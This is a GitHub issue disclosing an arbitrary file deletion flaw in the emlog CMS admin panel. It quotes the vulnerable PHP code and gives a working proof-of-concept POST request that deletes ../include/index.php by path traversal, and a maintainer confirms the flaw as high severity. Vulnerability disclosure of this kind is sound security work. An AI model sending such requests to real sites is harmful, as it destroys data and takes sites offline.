Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

emlog has any file deletion vulnerability #48

Closed
Rand0mPythoner opened this issue Sep 25, 2019 · 2 comments
Closed

emlog has any file deletion vulnerability #48

Rand0mPythoner opened this issue Sep 25, 2019 · 2 comments

Comments

@Rand0mPythoner
Copy link

Rand0mPythoner commented Sep 25, 2019

vulnerability in admin/data.php line 139:

if ($action == 'dell_all_bak') {
    if (!isset($_POST['bak'])) {
        emDirect('./data.php?error_a=1');
    } else{
        foreach ($_POST['bak'] as $val) {
            unlink($val);
        }
        emDirect('./data.php?active_del=1');
    }
}

post any filepath as "bak" , will delete it.
Login management background and view /admin/data.php?action=dell_all_bak
POST bak=anyfile,like ../index.php something.
POC:

Host: 127.0.0.1
Content-Length: 28
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/emlog/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: page_iframe_url=http://127.0.0.1/metinfo/index.php?lang=cn&pageset=1; pgv_pvi=3037471744; PHPSESSID=u91v66ktst9vrva3ueb6333kt2; EM_AUTHCOOKIE_WtaQDRqaTBRof8EENT0LY3HNhJzryEPL=admin%7C%7Ce4739a735508976ba1d54ac95a78be3b; EM_TOKENCOOKIE_55cd567609038eefc9aaa8c1c0e141e1=d0025af7e912a4cc8b114e2f6cda6597
Connection: close

bak%5B%5D=../include/index.php
@vibbow
Copy link
Contributor

vibbow commented Sep 25, 2019

Confirm as vulnerability

Severity Level: High

  • Exploitation could result in elevated privileges.
  • Exploitation could result in a significant data loss or downtime.

@Rand0mPythoner
Copy link
Author

Confirm as vulnerability

Severity Level: High

  • Exploitation could result in elevated privileges.
  • Exploitation could result in a significant data loss or downtime.

I will find more security vulnerability for u cms.
u attitude towards problems r very kind.
have a niceday!

@emlog emlog closed this as completed Jan 10, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants